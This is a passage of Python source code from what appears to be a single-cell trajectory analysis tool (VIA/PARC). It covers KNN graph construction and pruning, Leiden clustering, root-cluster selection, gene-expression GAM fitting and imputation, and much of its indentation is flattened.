                                                 colored(str(self.dist_std_local) + ' std dev above the mean', 'green'))
        if auto_ == False: local_pruning_bool = False
row_list = []
col_list = []
weight_list = []
        # neighbor_array is not listed in any order of proximity
# print('size neighbor array', neighbor_array.shape)
num_neigh = neighbor_array.shape[1]
distance_array = np.sqrt(distance_array)
n_neighbors = neighbor_array.shape[1]
n_cells = neighbor_array.shape[0]
rowi = 0
count_0dist = 0
discard_count = 0
if local_pruning_bool == True: # do some local pruning based on distance
for row in neighbor_array:
distlist = distance_array[rowi, :]
to_keep = np.where(distlist <= np.mean(distlist) + self.dist_std_local * np.std(distlist))[0] # 0*std
updated_nn_ind = row[np.ix_(to_keep)]
updated_nn_weights = distlist[np.ix_(to_keep)]
discard_count = discard_count + (num_neigh - len(to_keep))
for ik in range(len(updated_nn_ind)):
if rowi != row[ik]: # remove self-loops
row_list.append(rowi)
col_list.append(updated_nn_ind[ik])
dist = updated_nn_weights[ik]
if dist == 0:
count_0dist = count_0dist + 1
weight_list.append(dist)
rowi = rowi + 1
weight_list = np.asarray(weight_list)
            weight_list = 1. / (weight_list + 0.01)  # 0.05
if local_pruning_bool == False: # dont prune based on distance
row_list.extend(list(np.transpose(np.ones((n_neighbors, n_cells)) * range(0, n_cells)).flatten()))
col_list = neighbor_array.flatten().tolist()
#distance_array = np.sqrt(distance_array)
weight_list = (1. / (distance_array.flatten() + 0.01))
print('weight list ', np.percentile(np.asarray(weight_list), 5), np.percentile(np.asarray(weight_list),95))
# if local_pruning_bool == True: print('share of neighbors discarded in local distance pruning %.1f' % (discard_count / neighbor_array.size))
weight_list = weight_list *(np.mean(distance_array)**2)
print('mean distance array in make csr matrix', np.mean(distance_array))
weight_list = weight_list.tolist()
print('weight list ', np.percentile(np.asarray(weight_list), 5), np.percentile(np.asarray(weight_list), 95))
csr_graph = csr_matrix((np.array(weight_list), (np.array(row_list), np.array(col_list))),
shape=(n_cells, n_cells))
return csr_graph
def func_mode(self, ll):
# return MODE of list
# If multiple items are maximal, the function returns the first one encountered.
return max(set(ll), key=ll.count)
def run_toobig_subPARC(self, X_data, jac_std_toobig=1,
jac_weighted_edges=True):
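        # Re-clusters a single oversized cluster: builds a KNN graph on the subset, applies Jaccard-based
        # global pruning, runs Leiden community detection and reassigns very small populations to their
        # most common neighboring cluster.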
n_elements = X_data.shape[0]
hnsw = self.make_knn_struct(too_big=True, big_cluster=X_data)
if self.knn >= 0.8 * n_elements:
k = int(0.5 * n_elements)
else:
k = self.knn
neighbor_array, distance_array = hnsw.knn_query(X_data, k=k)
# print('shapes of neigh and dist array', neighbor_array.shape, distance_array.shape)
csr_array = self.make_csrmatrix_noselfloop(neighbor_array, distance_array)
sources, targets = csr_array.nonzero()
mask = np.zeros(len(sources), dtype=bool)
mask |= (csr_array.data > (
np.mean(csr_array.data) + np.std(csr_array.data) * 5)) # smaller distance means stronger edge
# print('sum of mask', sum(mask))
csr_array.data[mask] = 0
csr_array.eliminate_zeros()
sources, targets = csr_array.nonzero()
edgelist = list(zip(sources.tolist(), targets.tolist()))
edgelist_copy = edgelist.copy()
G = ig.Graph(edgelist, edge_attrs={'weight': csr_array.data.tolist()})
sim_list = G.similarity_jaccard(pairs=edgelist_copy) # list of jaccard weights
new_edgelist = []
sim_list_array = np.asarray(sim_list)
if jac_std_toobig == 'median':
threshold = np.median(sim_list)
else:
threshold = np.mean(sim_list) - jac_std_toobig * np.std(sim_list)
strong_locs = np.where(sim_list_array > threshold)[0]
for ii in strong_locs: new_edgelist.append(edgelist_copy[ii])
sim_list_new = list(sim_list_array[strong_locs])
if jac_weighted_edges == True:
G_sim = ig.Graph(n=n_elements, edges=list(new_edgelist), edge_attrs={'weight': sim_list_new})
else:
G_sim = ig.Graph(n=n_elements, edges=list(new_edgelist))
G_sim.simplify(combine_edges='sum')
resolution_parameter = 1
if jac_weighted_edges == True:
partition = leidenalg.find_partition(G_sim, leidenalg.ModularityVertexPartition, weights='weight',
n_iterations=self.n_iter_leiden, seed=self.random_seed)
else:
partition = leidenalg.find_partition(G_sim, leidenalg.ModularityVertexPartition,
n_iterations=self.n_iter_leiden, seed=self.random_seed)
# print('Q= %.2f' % partition.quality())
PARC_labels_leiden = np.asarray(partition.membership)
PARC_labels_leiden = np.reshape(PARC_labels_leiden, (n_elements, 1))
small_pop_list = []
small_cluster_list = []
small_pop_exist = False
dummy, PARC_labels_leiden = np.unique(list(PARC_labels_leiden.flatten()), return_inverse=True)
for cluster in set(PARC_labels_leiden):
population = len(np.where(PARC_labels_leiden == cluster)[0])
if population < 5: # <10
small_pop_exist = True
small_pop_list.append(list(np.where(PARC_labels_leiden == cluster)[0]))
small_cluster_list.append(cluster)
for small_cluster in small_pop_list:
for single_cell in small_cluster:
old_neighbors = neighbor_array[single_cell, :]
group_of_old_neighbors = PARC_labels_leiden[old_neighbors]
group_of_old_neighbors = list(group_of_old_neighbors.flatten())
available_neighbours = set(group_of_old_neighbors) - set(small_cluster_list)
if len(available_neighbours) > 0:
available_neighbours_list = [value for value in group_of_old_neighbors if
value in list(available_neighbours)]
best_group = max(available_neighbours_list, key=available_neighbours_list.count)
PARC_labels_leiden[single_cell] = best_group
do_while_time = time.time()
while (small_pop_exist == True) & (time.time() - do_while_time < 5):
small_pop_list = []
small_pop_exist = False
for cluster in set(list(PARC_labels_leiden.flatten())):
population = len(np.where(PARC_labels_leiden == cluster)[0])
if population < 10:
small_pop_exist = True
# print(cluster, ' has small population of', population, )
small_pop_list.append(np.where(PARC_labels_leiden == cluster)[0])
for small_cluster in small_pop_list:
for single_cell in small_cluster:
old_neighbors = neighbor_array[single_cell, :]
group_of_old_neighbors = PARC_labels_leiden[old_neighbors]
group_of_old_neighbors = list(group_of_old_neighbors.flatten())
best_group = max(set(group_of_old_neighbors), key=group_of_old_neighbors.count)
PARC_labels_leiden[single_cell] = best_group
dummy, PARC_labels_leiden = np.unique(list(PARC_labels_leiden.flatten()), return_inverse=True)
self.labels = PARC_labels_leiden
return PARC_labels_leiden
def recompute_weights(self, clustergraph_ig, pop_list_raw):
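        # Rescales cluster-graph edge weights by the populations of the two endpoint clusters
        # (w * (pop_s + pop_t) / (pop_s * pop_t)), then shifts and scales the new weights by their range.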
sparse_clustergraph = get_sparse_from_igraph(clustergraph_ig, weight_attr='weight')
n = sparse_clustergraph.shape[0]
sources, targets = sparse_clustergraph.nonzero()
edgelist = list(zip(sources, targets))
weights = sparse_clustergraph.data
new_weights = []
i = 0
for s, t in edgelist:
pop_s = pop_list_raw[s]
pop_t = pop_list_raw[t]
w = weights[i]
nw = w * (pop_s + pop_t) / (pop_s * pop_t) # *
new_weights.append(nw)
i = i + 1
scale_factor = max(new_weights) - min(new_weights)
wmin = min(new_weights)
new_weights = [(wi + wmin) / scale_factor for wi in new_weights]
sparse_clustergraph = csr_matrix((np.array(new_weights), (sources, targets)),shape=(n, n))
sources, targets = sparse_clustergraph.nonzero()
edgelist = list(zip(sources, targets))
return sparse_clustergraph, edgelist
def find_root_HumanCD34(self, graph_dense, PARC_labels_leiden, root_idx, true_labels):
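        # Assigns the root to the cluster containing the user-specified root cell index (root_idx) and
        # builds majority-truth labels per cluster for annotation of the cluster graph.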
majority_truth_labels = np.empty((len(PARC_labels_leiden), 1), dtype=object)
graph_node_label = []
true_labels = np.asarray(true_labels)
deg_list = graph_dense.sum(axis=1).reshape((1, -1)).tolist()[0]
for ci, cluster_i in enumerate(sorted(list(set(PARC_labels_leiden)))):
cluster_i_loc = np.where(np.asarray(PARC_labels_leiden) == cluster_i)[0]
majority_truth = self.func_mode(list(true_labels[cluster_i_loc]))
majority_truth_labels[cluster_i_loc] = str(majority_truth) + 'c' + str(cluster_i)
graph_node_label.append(str(majority_truth) + 'c' + str(cluster_i))
root = PARC_labels_leiden[root_idx]
return graph_node_label, majority_truth_labels, deg_list, root
def find_root_bcell(self, graph_dense, PARC_labels_leiden, root_user, true_labels):
majority_truth_labels = np.empty((len(PARC_labels_leiden), 1), dtype=object)
graph_node_label = []
true_labels = np.asarray(true_labels)
deg_list = graph_dense.sum(axis=1).reshape((1, -1)).tolist()[0]
for ci, cluster_i in enumerate(sorted(list(set(PARC_labels_leiden)))):
# print('cluster i', cluster_i)
cluster_i_loc = np.where(np.asarray(PARC_labels_leiden) == cluster_i)[0]
majority_truth = self.func_mode(list(true_labels[cluster_i_loc]))
majority_truth_labels[cluster_i_loc] = str(majority_truth) + 'c' + str(cluster_i)
graph_node_label.append(str(majority_truth) + 'c' + str(cluster_i))
root = PARC_labels_leiden[root_user]
return graph_node_label, majority_truth_labels, deg_list, root
def find_root(self, graph_dense, PARC_labels_leiden, root_user, true_labels, super_cluster_labels_sub,
super_node_degree_list):
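        # Selects the root cluster: among clusters whose majority true label matches root_user (and, when
        # super-cluster labels are available, whose super-cluster majority also matches), the cluster with the
        # lowest node degree is chosen. Falls back to an arbitrary cluster if no matching cluster is found.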
majority_truth_labels = np.empty((len(PARC_labels_leiden), 1), dtype=object)
graph_node_label = []
min_deg = 1000
super_min_deg = 1000
found_super_and_sub_root = False
found_any_root = False
true_labels = np.asarray(true_labels)
deg_list = graph_dense.sum(axis=1).reshape((1, -1)).tolist()[0]
print('deg list', deg_list) # locallytrimmed_g.degree()
for ci, cluster_i in enumerate(sorted(list(set(PARC_labels_leiden)))):
print('cluster i', cluster_i)
cluster_i_loc = np.where(np.asarray(PARC_labels_leiden) == cluster_i)[0]
majority_truth = str(self.func_mode(list(true_labels[cluster_i_loc])))
if self.super_cluster_labels != False:
super_majority_cluster = self.func_mode(list(np.asarray(super_cluster_labels_sub)[cluster_i_loc]))
super_majority_cluster_loc = np.where(np.asarray(super_cluster_labels_sub) == super_majority_cluster)[0]
super_majority_truth = self.func_mode(list(true_labels[super_majority_cluster_loc]))
super_node_degree = super_node_degree_list[super_majority_cluster]
if (str(root_user) in majority_truth) & (str(root_user) in str(super_majority_truth)):
if super_node_degree < super_min_deg:
found_super_and_sub_root = True
root = cluster_i
found_any_root = True
min_deg = deg_list[ci]
super_min_deg = super_node_degree
print('new root is', root, ' with degree', min_deg, 'and super node degree',
super_min_deg)
majority_truth_labels[cluster_i_loc] = str(majority_truth) + 'c' + str(cluster_i)
graph_node_label.append(str(majority_truth) + 'c' + str(cluster_i))
if (self.super_cluster_labels == False) | (found_super_and_sub_root == False):
print('self.super_cluster_labels', super_cluster_labels_sub, ' foundsuper_cluster_sub and super root',
found_super_and_sub_root)
for ic, cluster_i in enumerate(sorted(list(set(PARC_labels_leiden)))):
cluster_i_loc = np.where(np.asarray(PARC_labels_leiden) == cluster_i)[0]
print('cluster', cluster_i, 'set true labels', set(true_labels))
true_labels = np.asarray(true_labels)
majority_truth = str(self.func_mode(list(true_labels[cluster_i_loc])))
print('cluster', cluster_i, 'has majority', majority_truth, 'with degree list', deg_list)
if (str(root_user) in str(majority_truth)):
print('did not find a super and sub cluster with majority ', root_user)
if deg_list[ic] < min_deg:
root = cluster_i
found_any_root = True
min_deg = deg_list[ic]
print('new root is', root, ' with degree', min_deg)
# print('len graph node label', graph_node_label)
if found_any_root == False:
print('setting arbitrary root', cluster_i)
root = cluster_i
return graph_node_label, majority_truth_labels, deg_list, root
def full_graph_paths(self, X_data, n_components_original=1):
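        # Builds a very low-K igraph KNN graph in the PCA space, increasing K until the graph has the same
        # number of connected components as the original full graph; used later for shortest-path drawing.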
# make igraph object of very low-K KNN using the knn_struct PCA-dimension space made in PARC.
# This is later used by find_shortest_path for sc_bp visual
        # the neighbor array is not listed in any order of proximity
print('number of components in the original full graph', n_components_original)
print('for downstream visualization purposes we are also constructing a low knn-graph ')
neighbor_array, distance_array = self.knn_struct.knn_query(X_data, k=3)
csr_array = self.make_csrmatrix_noselfloop(neighbor_array, distance_array, auto_ = False)
n_comp, comp_labels = connected_components(csr_array, return_labels=True)
k_0 = 3
if n_components_original == 1:
while (n_comp > 1):
k_0 = k_0 + 1
neighbor_array, distance_array = self.knn_struct.knn_query(X_data, k=k_0)
csr_array = self.make_csrmatrix_noselfloop(neighbor_array, distance_array, auto_=False ) #do not automatically use the local-pruning of Via
n_comp, comp_labels = connected_components(csr_array, return_labels=True)
if n_components_original > 1:
while (k_0 <= 5) & (n_comp > n_components_original):
k_0 = k_0 + 1
neighbor_array, distance_array = self.knn_struct.knn_query(X_data, k=k_0)
csr_array = self.make_csrmatrix_noselfloop(neighbor_array, distance_array,auto_=False ) #do not automatically use the local-pruning of Via)
n_comp, comp_labels = connected_components(csr_array, return_labels=True)
row_list = []
print('size neighbor array in low-KNN in pca-space for visualization', neighbor_array.shape)
n_neighbors = neighbor_array.shape[1]
n_cells = neighbor_array.shape[0]
row_list.extend(list(np.transpose(np.ones((n_neighbors, n_cells)) * range(0, n_cells)).flatten()))
col_list = neighbor_array.flatten().tolist()
weight_list = (distance_array.flatten()).tolist()
csr_full_graph = csr_matrix((np.array(weight_list), (np.array(row_list), np.array(col_list))),
shape=(n_cells, n_cells))
sources, targets = csr_full_graph.nonzero()
edgelist = list(zip(sources.tolist(), targets.tolist()))
Gr = ig.Graph(edgelist, edge_attrs={'weight': csr_full_graph.data.tolist()})
Gr.simplify(combine_edges='sum')
return Gr
def get_gene_expression(self, gene_exp, title_gene=""):
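        # For each terminal state, fits a GAM of the given gene's expression against single-cell pseudotime,
        # weighted by each cell's branch probability, and plots the fitted trend for cells along that lineage.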
fig_0, ax = plt.subplots()
sc_pt = self.single_cell_pt_markov
sc_bp_original = self.single_cell_bp
n_terminal_states = sc_bp_original.shape[1]
jet = cm.get_cmap('jet', n_terminal_states)
cmap_ = jet(range(n_terminal_states))
for i in range(n_terminal_states):
sc_bp = sc_bp_original.copy()
loc_terminal_i = np.where(np.asarray(self.labels) == self.terminal_clusters[i])[0]
#sc_bp[loc_terminal_i,:] = 1.2
loc_i = np.where(sc_bp[:, i] > 0.8)[0]
val_pt = [sc_pt[pt_i] for pt_i in loc_i] # TODO, replace with array to speed up
# max_val_pt = np.percentile(np.asarray(val_pt),90)
max_val_pt = max(val_pt)
#print('gene exp max pt', max_val_pt)
loc_i_bp = np.where(sc_bp[:, i] > 0.000)[0] #0.001
loc_i_sc = np.where(np.asarray(sc_pt) <= max_val_pt)[0]
# print('loc i bp', loc_i_bp)
# print('loc i sc', loc_i_sc)
loc_ = np.intersect1d(loc_i_bp, loc_i_sc)
# print('loc_', loc_.shape)
gam_in = np.asarray(sc_pt)[loc_]
x = gam_in.reshape(-1, 1)
y = np.asarray(gene_exp)[loc_].reshape(-1, 1)
# print('Gene Expression:', gam_in.shape)
weights = np.asarray(sc_bp[:, i])[loc_].reshape(-1, 1)
# print('Gene Expression: setting up subplot number',i)
if len(loc_)>1:
#geneGAM = pg.LinearGAM(n_splines=20, spline_order=5, lam=10).fit(x, y, weights=weights)
geneGAM = pg.LinearGAM(n_splines=10, spline_order=4, lam=10).fit(x, y, weights=weights)
nx_spacing = 100
xval = np.linspace(min(sc_pt), max_val_pt, nx_spacing * 2)
yg = geneGAM.predict(X=xval)
            else:
                print('loc_ has length zero; skipping the GAM fit and plot for this terminal state')
                continue
            ax.plot(xval, yg, color=cmap_[i], linewidth=2, zorder=3, linestyle=(0, (5, 2, 1, 2)),
                    dash_capstyle='round', label='TS:' + str(self.terminal_clusters[i]))
plt.legend()
plt.title('Gene Expression ' + title_gene)
return
def do_magic(self,df_gene, magic_steps = 3, gene_list = []):
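        # MAGIC-style imputation: raises the row-normalized full single-cell graph to the power magic_steps
        # and multiplies it with the selected gene columns of df_gene, returning a smoothed gene DataFrame.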
#ad_gene is an ann data object from scanpy
if self.do_magic_bool == False:
print(colored('please re-run Via with do_magic set to True','red'))
return
else:
from sklearn.preprocessing import normalize
            transition_full_graph = normalize(self.csr_full_graph, norm='l1', axis=1) ** magic_steps  # row-normalize to obtain the transition matrix, then take its magic_steps-th power
            print('shape of transition matrix raised to power', magic_steps, transition_full_graph.shape)
subset = df_gene[gene_list].values
print('subset shape', subset.shape)
dot_ = transition_full_graph.dot(subset)#np.dot(transition_full_graph,subset )
print('dot_ product shape', dot_.shape)
df_imputed_gene = pd.DataFrame(dot_, index=df_gene.index, columns=gene_list)
print('shape of imputed gene matrix', df_imputed_gene.shape)
return df_imputed_gene
def run_subPARC(self):
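        # Main routine: builds the KNN graph, runs Leiden clustering (expanding oversized clusters and
        # reassigning tiny ones), constructs and prunes the cluster graph, computes pseudotime via hitting
        # times and Markov simulations, identifies terminal clusters and branch probabilities, and projects
        # the results onto single cells.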
root_user = self.root_user
X_data = self.data
too_big_factor = self.too_big_factor
small_pop = self.small_pop
jac_std_global = self.jac_std_global
jac_weighted_edges = self.jac_weighted_edges
n_elements = X_data.shape[0]
if self.is_coarse == True:
#graph for PARC
neighbor_array, distance_array = self.knn_struct.knn_query(X_data, k=self.knn)
csr_array_locally_pruned = self.make_csrmatrix_noselfloop(neighbor_array, distance_array) #incorporates local distance pruning
sources, targets = csr_array_locally_pruned.nonzero()
edgelist = list(zip(sources, targets))
edgelist_copy = edgelist.copy()
G = ig.Graph(edgelist, edge_attrs={'weight': csr_array_locally_pruned.data.tolist()}) # used for PARC
# print('average degree of prejacard graph is %.1f'% (np.mean(G.degree())))
# print('computing Jaccard metric')
sim_list = G.similarity_jaccard(pairs=edgelist_copy)
print('size neighbor array', neighbor_array.shape)
print('commencing global pruning')
sim_list_array = np.asarray(sim_list)
edge_list_copy_array = np.asarray(edgelist_copy)
if jac_std_global == 'median':
threshold = np.median(sim_list)
else:
threshold = np.mean(sim_list) - jac_std_global * np.std(sim_list)
strong_locs = np.where(sim_list_array > threshold)[0]
            print('Share of edges kept after global pruning %.2f' % (100 * len(strong_locs) / len(sim_list)), '%')
new_edgelist = list(edge_list_copy_array[strong_locs])
sim_list_new = list(sim_list_array[strong_locs])
G_sim = ig.Graph(n=n_elements, edges=list(new_edgelist), edge_attrs={'weight': sim_list_new})
G_sim.simplify(combine_edges='sum')
if self.is_coarse == True:
            #### construct the full graph (no pruning) to be used for the cluster-graph edges; neighbors are not listed in any order of proximity
row_list = []
n_neighbors = neighbor_array.shape[1]
n_cells = neighbor_array.shape[0]
row_list.extend(list(np.transpose(np.ones((n_neighbors, n_cells)) * range(0, n_cells)).flatten()))
col_list = neighbor_array.flatten().tolist()
print('distance values', np.percentile(distance_array,5),np.percentile(distance_array,95),np.mean(distance_array))
distance_array = np.sqrt(distance_array)
weight_list = (1. / (distance_array.flatten() + 0.05)) #0.05
mean_sqrt_dist_array = np.mean(distance_array)
weight_list = weight_list*(mean_sqrt_dist_array**2)
# we scale weight_list by the mean_distance_value because inverting the distances makes the weights range between 0-1
# and hence too many good neighbors end up having a weight near 0 which is misleading and non-neighbors have weight =0
weight_list = weight_list.tolist()
print('distance values', np.percentile(distance_array, 5), np.percentile(distance_array, 95),
np.mean(distance_array))
csr_full_graph = csr_matrix((np.array(weight_list), (np.array(row_list), np.array(col_list))),
shape=(n_cells, n_cells))
n_original_comp, n_original_comp_labels = connected_components(csr_full_graph, directed=False)
sources, targets = csr_full_graph.nonzero()
edgelist = list(zip(sources.tolist(), targets.tolist()))
G = ig.Graph(edgelist, edge_attrs={'weight': csr_full_graph.data.tolist()})
sim_list = G.similarity_jaccard(pairs=edgelist) # list of jaccard weights
ig_fullgraph = ig.Graph(list(edgelist), edge_attrs={'weight': sim_list})
ig_fullgraph.simplify(combine_edges='sum')
self.csr_array_pruned = G_sim # this graph is pruned for use in PARC
self.ig_full_graph = ig_fullgraph # for VIA we prune the vertex cluster graph *after* making the clustergraph
self.csr_full_graph = csr_full_graph
self.full_neighbor_array = neighbor_array
if self.is_coarse == True:
#knn graph used for making trajectory drawing on the visualization
self.full_graph_shortpath = self.full_graph_paths(X_data, n_original_comp)
neighbor_array = self.full_neighbor_array
if self.is_coarse == False:
ig_fullgraph = self.ig_full_graph #for Trajectory
G_sim = self.csr_array_pruned #for PARC
neighbor_array = self.full_neighbor_array #needed to assign spurious outliers to clusters
# print('average degree of SIMPLE graph is %.1f' % (np.mean(G_sim.degree())))
print('commencing community detection')
if jac_weighted_edges == True:
start_leiden = time.time()
# print('call leiden on weighted graph for ', self.n_iter_leiden, 'iterations')
partition = leidenalg.find_partition(G_sim, leidenalg.ModularityVertexPartition, weights='weight',
n_iterations=self.n_iter_leiden, seed=self.random_seed)
print(time.time() - start_leiden)
else:
start_leiden = time.time()
# print('call leiden on unweighted graph', self.n_iter_leiden, 'iterations')
partition = leidenalg.find_partition(G_sim, leidenalg.ModularityVertexPartition,
n_iterations=self.n_iter_leiden, seed=self.random_seed)
print(time.time() - start_leiden)
time_end_PARC = time.time()
# print('Q= %.1f' % (partition.quality()))
PARC_labels_leiden = np.asarray(partition.membership)
PARC_labels_leiden = np.reshape(PARC_labels_leiden, (n_elements, 1))
pop_list_1 = []
for item in set(list(PARC_labels_leiden.flatten())):
pop_list_1.append([item, list(PARC_labels_leiden.flatten()).count(item)])
print(pop_list_1)
too_big = False
# print('labels found after Leiden', set(list(PARC_labels_leiden.T)[0])) will have some outlier clusters that need to be added to a cluster if a cluster has members that are KNN
cluster_i_loc = np.where(PARC_labels_leiden == 0)[
0] # the 0th cluster is the largest one. so if cluster 0 is not too big, then the others wont be too big either
pop_i = len(cluster_i_loc)
print('largest cluster population', pop_i, too_big_factor, n_elements)
if pop_i > too_big_factor * n_elements: # 0.4
too_big = True
print('too big is', too_big)
cluster_big_loc = cluster_i_loc
list_pop_too_bigs = [pop_i]
cluster_too_big = 0
while too_big == True:
X_data_big = X_data[cluster_big_loc, :]
print(X_data_big.shape)
PARC_labels_leiden_big = self.run_toobig_subPARC(X_data_big)
# print('set of new big labels ', set(PARC_labels_leiden_big.flatten()))
PARC_labels_leiden_big = PARC_labels_leiden_big + 1000
# print('set of new big labels +1000 ', set(list(PARC_labels_leiden_big.flatten())))
pop_list = []
for item in set(list(PARC_labels_leiden_big.flatten())):
pop_list.append([item, list(PARC_labels_leiden_big.flatten()).count(item)])
# print('pop of new big labels', pop_list)
jj = 0
print('shape PARC_labels_leiden', PARC_labels_leiden.shape)
for j in cluster_big_loc:
PARC_labels_leiden[j] = PARC_labels_leiden_big[jj]
jj = jj + 1
dummy, PARC_labels_leiden = np.unique(list(PARC_labels_leiden.flatten()), return_inverse=True)
#print('new set of labels ')
pop_list_1 = []
for item in set(list(PARC_labels_leiden.flatten())):
pop_list_1.append([item, list(PARC_labels_leiden.flatten()).count(item)])
#print(pop_list_1, set(PARC_labels_leiden))
too_big = False
set_PARC_labels_leiden = set(PARC_labels_leiden)
PARC_labels_leiden = np.asarray(PARC_labels_leiden)
for cluster_ii in set_PARC_labels_leiden:
cluster_ii_loc = np.where(PARC_labels_leiden == cluster_ii)[0]
pop_ii = len(cluster_ii_loc)
not_yet_expanded = pop_ii not in list_pop_too_bigs
if pop_ii > too_big_factor * n_elements and not_yet_expanded == True:
too_big = True
#print('cluster', cluster_ii, 'is too big and has population', pop_ii)
cluster_big_loc = cluster_ii_loc
cluster_big = cluster_ii
big_pop = pop_ii
if too_big == True:
list_pop_too_bigs.append(big_pop)
print('cluster', cluster_big, 'is too big with population', big_pop, '. It will be expanded')
dummy, PARC_labels_leiden = np.unique(list(PARC_labels_leiden.flatten()), return_inverse=True)
small_pop_list = []
small_cluster_list = []
small_pop_exist = False
for cluster in set(PARC_labels_leiden):
population = len(np.where(PARC_labels_leiden == cluster)[0])
if population < small_pop: # 10
small_pop_exist = True
small_pop_list.append(list(np.where(PARC_labels_leiden == cluster)[0]))
small_cluster_list.append(cluster)
for small_cluster in small_pop_list:
for single_cell in small_cluster:
old_neighbors = neighbor_array[single_cell, :]
group_of_old_neighbors = PARC_labels_leiden[old_neighbors]
group_of_old_neighbors = list(group_of_old_neighbors.flatten())
available_neighbours = set(group_of_old_neighbors) - set(small_cluster_list)
if len(available_neighbours) > 0:
available_neighbours_list = [value for value in group_of_old_neighbors if
value in list(available_neighbours)]
best_group = max(available_neighbours_list, key=available_neighbours_list.count)
PARC_labels_leiden[single_cell] = best_group
time_smallpop = time.time()
        while (small_pop_exist == True) & (time.time() - time_smallpop < 15):
small_pop_list = []
small_pop_exist = False
for cluster in set(list(PARC_labels_leiden.flatten())):
population = len(np.where(PARC_labels_leiden == cluster)[0])
if population < small_pop:
small_pop_exist = True
# print(cluster, ' has small population of', population, )
small_pop_list.append(np.where(PARC_labels_leiden == cluster)[0])
for small_cluster in small_pop_list:
for single_cell in small_cluster:
old_neighbors = neighbor_array[single_cell, :]
group_of_old_neighbors = PARC_labels_leiden[old_neighbors]
group_of_old_neighbors = list(group_of_old_neighbors.flatten())
best_group = max(set(group_of_old_neighbors), key=group_of_old_neighbors.count)
PARC_labels_leiden[single_cell] = best_group
dummy, PARC_labels_leiden = np.unique(list(PARC_labels_leiden.flatten()), return_inverse=True)
PARC_labels_leiden = list(PARC_labels_leiden.flatten())
# print('final labels allocation', set(PARC_labels_leiden))
pop_list = []
pop_list_raw = []
for item in range(len(set(PARC_labels_leiden))):
pop_item = PARC_labels_leiden.count(item)
pop_list.append((item, pop_item))
pop_list_raw.append(pop_item)
print('list of cluster labels and populations', len(pop_list), pop_list)
self.labels = PARC_labels_leiden # list
n_clus = len(set(self.labels))
##determine majority truth
if self.pseudotime == True:
## Make cluster-graph (1)
vc_graph = ig.VertexClustering(ig_fullgraph,
membership=PARC_labels_leiden) # jaccard weights, bigger is better
vc_graph = vc_graph.cluster_graph(combine_edges='sum')
# print('vc graph G_sim', vc_graph)
# print('vc graph G_sim old', vc_graph_old)
reweighted_sparse_vc, edgelist = self.recompute_weights(vc_graph, pop_list_raw)
            print('length of old edge list', len(edgelist))  # 0.15 for CD34
if self.dataset == 'toy': # ''humanCD34':# == False:
global_pruning_std = 2
print('Toy: global cluster graph pruning level', global_pruning_std)
# toy data is usually simpler so we dont need to prune the links as the clusters are usually well separated such that spurious links dont exist
elif self.dataset == 'bcell':
global_pruning_std = 0.15
print('Bcell: global cluster graph pruning level', global_pruning_std)
else:
global_pruning_std = 0.15
print('Humancd34: global cluster graph pruning level', global_pruning_std)
edgeweights, edgelist, comp_labels = local_pruning_clustergraph_mst(reweighted_sparse_vc,
global_pruning_std=global_pruning_std,
preserve_disconnected=self.preserve_disconnected) # 0.8 on 20knn and 40ncomp #0.15
self.connected_comp_labels = comp_labels
print('final comp labels set', set(comp_labels))
            print('length of new edge list', len(edgelist))
locallytrimmed_g = ig.Graph(edgelist, edge_attrs={'weight': edgeweights.tolist()})
# print('locally trimmed_g', locallytrimmed_g)
locallytrimmed_g = locallytrimmed_g.simplify(combine_edges='sum')
# print('locally trimmed and simplified', locallytrimmed_g)
locallytrimmed_sparse_vc = get_sparse_from_igraph(locallytrimmed_g, weight_attr='weight')
layout = locallytrimmed_g.layout_fruchterman_reingold(
weights='weight') ##final layout based on locally trimmed
# globally trimmed link
sources, targets = locallytrimmed_sparse_vc.nonzero()
edgelist_simple = list(zip(sources.tolist(), targets.tolist()))
edgelist_unique = set(tuple(sorted(l)) for l in edgelist_simple) # keep only one of (0,1) and (1,0)
self.edgelist_unique = edgelist_unique
self.edgelist = edgelist
x_lazy = self.x_lazy
alpha_teleport = self.alpha_teleport
# number of components
graph_dict = {}
n_components, labels = connected_components(csgraph=locallytrimmed_sparse_vc, directed=False,
return_labels=True)
print('there are ', n_components, 'components in the graph')
df_graph = pd.DataFrame(locallytrimmed_sparse_vc.todense())
df_graph['cc'] = labels
df_graph['pt'] = float('NaN')
df_graph['markov_pt'] = float('NaN')
df_graph['majority_truth'] = 'maj truth'
df_graph['graph_node_label'] = 'node label'
set_parc_labels = list(set(PARC_labels_leiden))
set_parc_labels.sort()
print('parc labels', set_parc_labels)
#for ii, jj in enumerate(PARC_labels_leiden):
terminal_clus = []
node_deg_list = []
super_terminal_clus_revised = []
pd_columnnames_terminal = []
dict_terminal_super_sub_pairs = {}
self.root = []
for comp_i in range(n_components):
loc_compi = np.where(labels == comp_i)[0]
a_i = df_graph.iloc[loc_compi][loc_compi].values
a_i = csr_matrix(a_i, (a_i.shape[0], a_i.shape[0]))
cluster_labels_subi = [x for x in loc_compi]
sc_labels_subi = [PARC_labels_leiden[i] for i in range(len(PARC_labels_leiden)) if
(PARC_labels_leiden[i] in cluster_labels_subi)]
sc_truelabels_subi = [self.true_label[i] for i in range(len(PARC_labels_leiden)) if
(PARC_labels_leiden[i] in cluster_labels_subi)]
if self.dataset == 'toy':
if self.super_cluster_labels != False:
super_labels_subi = [self.super_cluster_labels[i] for i in range(len(PARC_labels_leiden)) if
(PARC_labels_leiden[i] in cluster_labels_subi)]
print('super node degree', self.super_node_degree_list)
graph_node_label, majority_truth_labels, node_deg_list_i, root_i = self.find_root(a_i,
sc_labels_subi,
root_user,
sc_truelabels_subi,
super_labels_subi,
self.super_node_degree_list)
else:
graph_node_label, majority_truth_labels, node_deg_list_i, root_i = self.find_root(a_i,
sc_labels_subi,
root_user,
sc_truelabels_subi,
[], [])
elif self.dataset == 'humanCD34':
graph_node_label, majority_truth_labels, node_deg_list_i, root_i = self.find_root_HumanCD34(a_i,
sc_labels_subi,
root_user,
sc_truelabels_subi)
elif self.dataset == 'bcell':
'''
if self.super_cluster_labels != False:
super_labels_subi = [self.super_cluster_labels[i] for i in range(len(PARC_labels_leiden)) if
(PARC_labels_leiden[i] in cluster_labels_subi)]
graph_node_label, majority_truth_labels, node_deg_list_i, root_i = self.find_root(a_i,
sc_labels_subi,
root_user,
sc_truelabels_subi,
super_labels_subi,
self.super_node_degree_list)
else: # if this is p0.run()
graph_node_label, majority_truth_labels, node_deg_list_i, root_i = self.find_root(a_i,
sc_labels_subi,
root_user,
sc_truelabels_subi,
[], [])
'''
graph_node_label, majority_truth_labels, node_deg_list_i, root_i = self.find_root_bcell(a_i,
sc_labels_subi,
root_user,
sc_truelabels_subi)
self.root.append(root_i)
for item in node_deg_list_i:
